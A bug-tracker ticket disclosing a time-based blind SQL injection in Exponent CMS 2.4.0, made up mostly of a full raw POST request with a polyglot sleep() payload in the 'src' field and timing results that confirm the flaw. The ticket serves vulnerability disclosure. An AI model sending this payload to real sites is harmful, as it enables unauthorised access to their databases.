#1390 new
Nicky

Blind SQL Injection Vulnerability in Exponent CMS 2.4.0

Reported by Nicky | November 4th, 2016 @ 02:32 AM

POST /exponent/index.php HTTP/1.1
Content-Length: 865
Content-Type: multipart/form-data; boundary=-----Boundary_GXLNYFRMTV
X-Requested-With: XMLHttpRequest
Referer: http://192.168.118.1:80/exponent/
Cookie: PHPSESSID=671871947f2a01e5a385139b4131c7c1; adminer_key=9481c8797fb634e88f45043b9f1590fe; osp=0000
Host: 192.168.118.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: /
Content-Type: multipart/form-data; boundary=-----Boundary_GVJVYRLGSF

-------Boundary_GVJVYRLGSF Content-Disposition: form-data; name="action"

update
-------Boundary_GVJVYRLGSF Content-Disposition: form-data; name="body"

1
-------Boundary_GVJVYRLGSF Content-Disposition: form-data; name="controller"

text
-------Boundary_GVJVYRLGSF Content-Disposition: form-data; name="id"

-------Boundary_GVJVYRLGSF Content-Disposition: form-data; name="int"

-------Boundary_GVJVYRLGSF Content-Disposition: form-data; name="rank"

-------Boundary_GVJVYRLGSF Content-Disposition: form-data; name="revision_id"

-------Boundary_GVJVYRLGSF Content-Disposition: form-data; name="src"

(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ -------Boundary_GVJVYRLGSF Content-Disposition: form-data; name="title"

Mr.
-------Boundary_GVJVYRLGSF--

POST (multipart) input src was set to (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/

Tests performed:
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ => 18.377 s (select(0)from(select(sleep(4)))v)/*'+(select(0)from(select(sleep(4)))v)+'"+(select(0)from(select(sleep(4)))v)+"*/ => 12.683 s (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.437 s (select(0)from(select(sleep(2)))v)/*'+(select(0)from(select(sleep(2)))v)+'"+(select(0)from(select(sleep(2)))v)+"*/ => 6.349 s (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.624 s (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.967 s (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.998 s (select(0)from(select(sleep(4)))v)/*'+(select(0)from(select(sleep(4)))v)+'"+(select(0)from(select(sleep(4)))v)+"*/ => 13.104 s (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.234 s

Original value: @footer

Comments and changes to this ticket

Please Sign in or create a free account to add a new ticket.

With your very own profile, you can contribute to projects, track your activity, watch tickets, receive and update tickets through your email and much more.

New-ticket Create new ticket

Create your profile

Help contribute to this project by taking a few moments to create your personal profile. Create your profile ยป

Bug Tracker for Exponent CMS

Shared Ticket Bins

People watching this ticket

Pages